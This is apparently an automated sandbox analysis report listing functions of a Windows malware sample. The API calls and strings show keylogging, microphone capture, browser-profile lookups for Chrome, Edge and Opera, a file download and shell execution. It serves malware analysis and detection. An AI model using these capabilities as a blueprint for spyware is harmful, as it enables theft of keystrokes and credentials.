                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DownloadFileSleep
                                                                                                                                                                    • String ID: !D@
                                                                                                                                                                    • API String ID: 1931167962-604454484
                                                                                                                                                                    • Opcode ID: 2f1831598372491dadb721e90b3410e2fe4d3f0216fe238a0c724ad649f31e23
                                                                                                                                                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                                                                                                                    • Opcode Fuzzy Hash: 2f1831598372491dadb721e90b3410e2fe4d3f0216fe238a0c724ad649f31e23
                                                                                                                                                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                    • String ID: : $Se.
                                                                                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                    • Instruction ID: c4ac59c8fb4a94e0f177d725ad8a22b494e6293ee120f2eb108e6e8850a7856b
                                                                                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                    • Instruction Fuzzy Hash: E61106BA900248AECB11CFACD841BDEFBFCEF69604F60405EE645E7212E6705B02C765
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                    • API String ID: 481472006-2430845779
                                                                                                                                                                    • Opcode ID: 4d6ed76d2c0007f2ef8e18d25abc2b2ad824726885c52fffdea772383ef611f4
                                                                                                                                                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d6ed76d2c0007f2ef8e18d25abc2b2ad824726885c52fffdea772383ef611f4
                                                                                                                                                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: alarm.wav$hYG
                                                                                                                                                                    • API String ID: 1174141254-2782910960
                                                                                                                                                                    • Opcode ID: bf5f21d06ae488bc00e2b8087b107824ec671a0069743e065df0f61d2393d0c7
                                                                                                                                                                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                                                                                                                    • Opcode Fuzzy Hash: bf5f21d06ae488bc00e2b8087b107824ec671a0069743e065df0f61d2393d0c7
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                                                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                                                                    • Opcode ID: d2165033513dcf71b3ac2fd0adae2b36f4a3385a09ded61426f46b30c38066df
                                                                                                                                                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                                                                                                                    • Opcode Fuzzy Hash: d2165033513dcf71b3ac2fd0adae2b36f4a3385a09ded61426f46b30c38066df
                                                                                                                                                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 274C2903
                                                                                                                                                                      • Part of subcall function 274C35D2: RaiseException.KERNEL32(?,?,?,274C2925,00000000,00000000,00000000,?,?,?,?,?,274C2925,?,274D21B8), ref: 274C3632
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 274C2920
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                    • Opcode ID: 2add6f9d9f888f405db76ea3f27695fb5af27b46539ce7190e2595827eb38502
                                                                                                                                                                    • Instruction ID: 832a9c0bb258b146dd16437e303a9c21c714480f0ad2ac5eca843908b5eefb0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2add6f9d9f888f405db76ea3f27695fb5af27b46539ce7190e2595827eb38502
                                                                                                                                                                    • Instruction Fuzzy Hash: C3F0283CA0020CB78B01E6A8ED449DF776C5F51E50F90467CEE14D2190EFB0EA16C5D2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • waveInPrepareHeader.WINMM(2413D270,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                                                                                                    • waveInAddBuffer.WINMM(2413D270,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                    • String ID: XMG
                                                                                                                                                                    • API String ID: 2315374483-813777761
                                                                                                                                                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocaleValid
                                                                                                                                                                    • String ID: IsValidLocaleName$JD
                                                                                                                                                                    • API String ID: 1901932003-2234456777
                                                                                                                                                                    • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                                                                                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                                                                                                                    • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                                                                                                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                    • API String ID: 1174141254-4188645398
                                                                                                                                                                    • Opcode ID: 1be31c3d09ddb0bbaec834815553409634896179868bb1db145055bbc5a9ba63
                                                                                                                                                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                                                                                                                    • Opcode Fuzzy Hash: 1be31c3d09ddb0bbaec834815553409634896179868bb1db145055bbc5a9ba63
                                                                                                                                                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                    • API String ID: 1174141254-2800177040
                                                                                                                                                                    • Opcode ID: 20274c63270a20d3158dbeafeaac512f2e8c3b95a24c8d70e3b0729698767f80
                                                                                                                                                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                                                                                                                    • Opcode Fuzzy Hash: 20274c63270a20d3158dbeafeaac512f2e8c3b95a24c8d70e3b0729698767f80
                                                                                                                                                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                    • API String ID: 1174141254-1629609700
                                                                                                                                                                    • Opcode ID: b3b91882f06e0c799b00c6ad1b5b2d0b23f3320a6a7ace62f467a88fe309f294
                                                                                                                                                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                                                                                                                    • Opcode Fuzzy Hash: b3b91882f06e0c799b00c6ad1b5b2d0b23f3320a6a7ace62f467a88fe309f294
                                                                                                                                                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                                                                                                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                                                                                                                                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                                                                                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                                                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                                                                                    • API String ID: 2738857842-2658077756
                                                                                                                                                                    • Opcode ID: ebf392733fa6af1cef2b299d24dcfaafd055ccf9a66db9e14e7d9e277e57d489
                                                                                                                                                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                                                                                                                    • Opcode Fuzzy Hash: ebf392733fa6af1cef2b299d24dcfaafd055ccf9a66db9e14e7d9e277e57d489
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: uD
                                                                                                                                                                    • API String ID: 0-2547262877
                                                                                                                                                                    • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                                                                                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                                                                                                                    • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                                                                                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,274C6C7C,?), ref: 274C6A1E
                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,274C6C7C,?), ref: 274C6A35
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: |lL'
                                                                                                                                                                    • API String ID: 0-3097904926
                                                                                                                                                                    • Opcode ID: bc11d9a75014ed6c73289b128c654a07cd060c5a7f6931c09d08aa0260bdd657
                                                                                                                                                                    • Instruction ID: c748252fe306db054a8230c6c135034916fcbbe4225172bd68e5fb44f03fc9e7
                                                                                                                                                                    • Opcode Fuzzy Hash: bc11d9a75014ed6c73289b128c654a07cd060c5a7f6931c09d08aa0260bdd657
                                                                                                                                                                    • Instruction Fuzzy Hash: D7F04974804509CBDB00DB68C449BEC77B0FB42339F28875CE4788A2D6DB7A9986CB42
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                    • String ID: !D@$open
                                                                                                                                                                    • API String ID: 587946157-1586967515
                                                                                                                                                                    • Opcode ID: 94ae01d4d8b7264207e9bd3f4e7ba97e74bef168960cfc99b3f8e3eceb9b28ff
                                                                                                                                                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                                                                                                                    • Opcode Fuzzy Hash: 94ae01d4d8b7264207e9bd3f4e7ba97e74bef168960cfc99b3f8e3eceb9b28ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: State
                                                                                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                                                                                    • Opcode ID: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                                                                                                                                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                                                                                                                    • Opcode Fuzzy Hash: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
